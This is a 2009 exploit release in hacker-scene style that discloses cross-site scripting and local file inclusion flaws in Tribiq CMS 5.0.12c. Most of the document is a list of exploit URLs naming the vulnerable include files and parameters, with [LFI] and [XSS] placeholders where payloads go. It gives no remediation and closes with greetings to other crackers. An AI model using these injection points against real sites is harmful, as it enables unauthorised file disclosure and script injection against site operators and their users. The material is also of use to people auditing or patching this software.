Tribiq CMS version 5.0.12c suffers from cross site scripting and local file inclusion vulnerabilities.
c531aafc7ccd4fd12a3cef9881cc9b0feb72d7aad64683b308606a76108b73f0
┌┌─────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└─────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Local File Include ] [ XSS ] ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Script : Tribiq CMS 5.0.12c │ │ Register Globals : │
│ Download : sourceforge.net │ │ │
│ Method : GET │ │ [ ] ON [█] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : system information │ │ │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│ DALnet #crackers ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/toppanel.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[LFI]
[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errordisplay=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errormessage=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[title]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threadlastpost]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[replies]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threads]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[description]=[XSS]
http://localhost/path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=[XSS]
└──────────────────────────────────────────────────────────────────────────────────┘
Greets:
rd0, The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2009 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘